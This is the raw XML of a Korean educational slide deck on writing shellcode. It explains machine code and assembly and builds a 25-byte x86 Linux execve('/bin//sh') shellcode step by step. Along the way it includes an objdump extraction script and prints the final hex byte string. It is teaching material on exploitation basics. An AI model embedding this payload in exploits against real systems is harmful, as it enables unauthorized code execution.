                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6CC019F9-A761-418A-B344-87A045122075}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4873407" y="1714500"/>
            <a:ext cx="3345989" cy="443136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eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>와 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ebx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>를 순서대로 스택에 넣습니다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202C6906-0403-4AC2-B79B-60DE6E9DFA5D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106008" y="3763108"/>
            <a:ext cx="835269" cy="4659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7E178FC7-5931-4653-9E27-24C27D1B040F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2787162" y="4009295"/>
            <a:ext cx="1318846" cy="4396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855836"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:push dir="u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CAE50202-6F17-4FA6-BC34-C5E162F2C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90" y="1898038"/>
            <a:ext cx="2690079" cy="3612763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4" name="텍스트 개체 틀 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6CC019F9-A761-418A-B344-87A045122075}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4873407" y="1714500"/>
            <a:ext cx="3345989" cy="443136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ecx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>에 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>의 현재 주소를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해주고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en-US" altLang="ko-KR" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>edx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>xor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>을 통해 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>으로 만들어줍니다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202C6906-0403-4AC2-B79B-60DE6E9DFA5D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106008" y="4659923"/>
            <a:ext cx="767399" cy="615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7E178FC7-5931-4653-9E27-24C27D1B040F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2787162" y="4545623"/>
            <a:ext cx="1318846" cy="3516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301273"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:push dir="u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F9901753-442A-42A2-8E28-96E9F9BFE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90" y="1898038"/>
            <a:ext cx="2690079" cy="3612763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4" name="텍스트 개체 틀 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6CC019F9-A761-418A-B344-87A045122075}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4873407" y="1714500"/>
            <a:ext cx="3345989" cy="443136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execve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>의 시스템 콜 번호를 넣고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ko-KR" altLang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>호출해줍니다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202C6906-0403-4AC2-B79B-60DE6E9DFA5D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106008" y="5200650"/>
            <a:ext cx="767399" cy="2242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7E178FC7-5931-4653-9E27-24C27D1B040F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2787162" y="4976446"/>
            <a:ext cx="1318846" cy="4484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629022"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:push dir="u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4" name="텍스트 개체 틀 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6CC019F9-A761-418A-B344-87A045122075}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4873407" y="1714500"/>
            <a:ext cx="3345989" cy="443136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ko-KR" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>execve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(filename, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>argv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en-US" altLang="ko-KR" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>envp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>execve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>의 시스템콜 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>= 11, 0xb)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각각 스택을 이용하여서</a:t>
            </a:r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>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>filename </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>부분에는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/bin//</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sh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의</a:t>
            </a:r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ko-KR" altLang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>주소를 넣고</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>,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argv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부분에는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>{{“/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>”}, 0x0} </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>의 주소를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넣고</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>,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envp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>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>부분에는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>{{0x0}} </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>의 주소를 넣었습니다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endParaRPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>는 이차원 배열이기 때문에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ko-KR" altLang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>각 주소를 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>push</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>한 뒤</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>그 주소를 넣어준 것입니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="15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E2DF295-1436-421E-B08A-F40CEEA86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90" y="1898038"/>
            <a:ext cx="2690079" cy="361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83504"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:push dir="u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44966AE-B22D-41CB-B2FE-E1D518C75F40}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1627565" y="2395818"/>
            <a:ext cx="7032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#!/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bin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sh</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US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inp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=$1</a:t>
            </a:r>
          </a:p>
          <a:p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for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$(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objdump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-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$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inp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| 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grep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"^ " | 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cut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-f2); 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do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echo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-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'\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x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'$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; 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done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; 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echo</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US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40400EB-E2F1-41FC-8E1B-F2FBC5CFA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565" y="3915902"/>
            <a:ext cx="6266571" cy="97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8045"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:push dir="u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44966AE-B22D-41CB-B2FE-E1D518C75F40}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1627565" y="2395818"/>
            <a:ext cx="70328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make_code.sh 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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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chmod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통해 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x(executable) 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권한을 줍니다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 후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shellcode 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파일의 경로를 인자로 주게 되면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내부에서 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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objdump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이용하여 </a:t>
            </a:r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쉘코드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형식으로 추출해줍니다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72BB697-AC91-46BC-A5BF-6F4A7E1442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901"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1884612" y="3973537"/>
            <a:ext cx="5419725" cy="55794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CA9A59DA-C302-4081-A99B-6C8063981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395" y="4140958"/>
            <a:ext cx="539115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30319"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:push dir="u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667F0D-8DF1-4450-A740-0EB0694C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Finally, Let’s make Shell Code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44966AE-B22D-41CB-B2FE-E1D518C75F40}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1513265" y="2976110"/>
            <a:ext cx="676029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\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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xcd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\x80</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/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이제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다음과 같은 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25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바이트가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완성되었습니다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!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811020"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:push dir="u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2CB6C5-8D0D-4F6E-979F-CC75B47A59F0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1441938" y="2358243"/>
            <a:ext cx="71305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http://karfn84.tistory.com/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http://slidescarnival.com/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4"/>
              </a:rPr>
              <a:t>https://github.com/sunghun7511/StudyAssembly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5"/>
              </a:rPr>
              <a:t>https://opentutorials.org/module/1087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6"/>
              </a:rPr>
              <a:t>http://beomnaegol.tistory.com/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7"/>
              </a:rPr>
              <a:t>https://softwareengineering.stackexchange.com/questions/127668/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8"/>
              </a:rPr>
              <a:t>http://dakuo.tistory.com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9"/>
              </a:rPr>
              <a:t>http://luckyyowu.tistory.com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28F870-12B3-42A1-838E-A87FC12255D9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1292469" y="1951892"/>
            <a:ext cx="644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This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slides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are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referenced from..</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US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573444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800299" y="-7800"/>
            <a:ext cx="190200" cy="6857700"/>
            <a:chOff x="808650" y="-7800"/>
            <a:chExt cx="190200" cy="6857700"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="137" name="Shape 137"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="808650" y="3333900"/>
              <a:ext cx="190200" cy="190200"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="39C0BA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cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="138" name="Shape 138"/>
            <p:cNvCxnSpPr>
              <a:endCxn id="137" idx="0"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="903750" y="-7800"/>
              <a:ext cx="0" cy="33417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39" name="Shape 139"/>
            <p:cNvCxnSpPr>
              <a:stCxn id="137" idx="4"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="903750" y="3524100"/>
              <a:ext cx="0" cy="332580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11" name="Shape 89">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AE30BFA5-9F4C-4DD8-B133-3CA15122DCAE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1266093" y="2882400"/>
            <a:ext cx="7816361" cy="1093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ko-KR" altLang="en-US" sz="5000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="39C0BA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기계어</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="5000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="39C0BA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5000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="39C0BA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어셈블리어</a:t>
            </a:r>
            <a:endParaRPr lang="en" sz="5000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="39C0BA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1923512"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:push dir="u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subTitle" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1336100" y="3022650"/>
            <a:ext cx="7337699" cy="81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-KR" altLang="en-US" sz="3600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2E3037"/>
                </a:solidFill>
              </a:rPr>
              <a:t>감사합니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="3600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2E3037"/>
                </a:solidFill>
              </a:rPr>
              <a:t>!</a:t>
            </a:r>
            <a:endParaRPr lang="en" sz="3600" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="2E3037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240807-5487-4B6B-A333-6ADC1198908F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1433146" y="3835350"/>
            <a:ext cx="713056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strike="sngStrike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저는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1100" strike="sngStrike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킹갓제너러엠퍼러충무공마제스티짱해커이지만</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" strike="sngStrike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만약 질문 사항이 있으시다면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이메일 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sunghun7511@naver.com</a:t>
            </a:r>
          </a:p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또는 카카오톡 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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SHGroupCEO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또는 페이스북 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@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김성훈</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR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으로</a:t>
            </a:r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연락 주시면 됩니다</a:t>
            </a:r>
            <a:r>
              <a:rPr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..!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1100" strike="sngStrike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하지만</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" strike="sngStrike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strike="sngStrike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답은 제가 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1100" strike="sngStrike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내킬때</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" strike="sngStrike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~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23B7B1-85A6-4797-9491-E7EBEB7DC0A8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7209690" y="6627168"/>
            <a:ext cx="20056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>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Slide templates from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SlidesCarnival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4116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-KR" altLang="en-US" dirty="0"/>
              <a:t>기계어가 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" err="1"/>
              <a:t>뭔데</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>?</a:t>
            </a:r>
            <a:endParaRPr lang="en" dirty="0"/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165497" y="1740878"/>
            <a:ext cx="6858000" cy="48270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ko-KR" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F3F3F3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기계어란</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F3F3F3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2000" dirty="0"/>
              <a:t>CPU</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>가 알아들을 수 있는</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0"/>
              <a:t>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비트 단위로 쓰인 컴퓨터 언어를 통틀어 말합니다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altLang="ko-KR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기계어는 프로그래밍 언어 중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dirty="0"/>
              <a:t>제일 낮은 단계에 있습니다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ko-KR" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>기계어는 실제로 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0"/>
              <a:t>0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>과 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>로 된 이진수로 표현되어 있습니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0"/>
              <a:t>. (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>하지만 보통 우리는 이것을 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0"/>
              <a:t>16</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>진수 숫자로 바꾸어 표현합니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0"/>
              <a:t>.)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298862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-KR" altLang="en-US" dirty="0"/>
              <a:t>그럼 어셈블리 언어는</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>?</a:t>
            </a:r>
            <a:endParaRPr lang="en" dirty="0"/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165497" y="1740878"/>
            <a:ext cx="6858000" cy="48270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ko-KR" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F3F3F3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어셈블리 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="F3F3F3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언어란</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F3F3F3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altLang="ko-KR" sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="F3F3F3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기계어와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1:1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대응이 되는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저급 프로그래밍 언어입니다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기계어는 단순히 숫자로만 되어있기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때문에 사람이 작성하거나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읽기 어렵습니다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그렇기 때문에 기계어의 각 명령마다 쉽게 기억할 수 있는 기호를 정해서 알아보기 쉽도록 한 것입니다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99781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2204</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>화면 슬라이드 쇼(4:3)</PresentationFormat>
  <Paragraphs>621</Paragraphs>
  <Slides>70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70</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="76" baseType="lpstr">
      <vt:lpstr>나눔고딕</vt:lpstr>
      <vt:lpstr>Quicksand</vt:lpstr>
      <vt:lpstr>Ubuntu Mono</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>맑은 고딕</vt:lpstr>
      <vt:lpstr>Eleanor template</vt:lpstr>
      <vt:lpstr>  hell   ode</vt:lpstr>
      <vt:lpstr>Who am I?</vt:lpstr>
      <vt:lpstr>순서</vt:lpstr>
      <vt:lpstr>What is Shell Code</vt:lpstr>
      <vt:lpstr>이런 것들을 보신적이 있으신가요?</vt:lpstr>
      <vt:lpstr>이런 것들 은요?</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>기계어가 뭔데?</vt:lpstr>
      <vt:lpstr>그럼 어셈블리 언어는?</vt:lpstr>
      <vt:lpstr>그래서, 어셈블리를 왜 알아야 하는데?</vt:lpstr>
      <vt:lpstr>그래서, 어셈블리를 왜 알아야 하는데?</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>How can we make Shell Codes?</vt:lpstr>
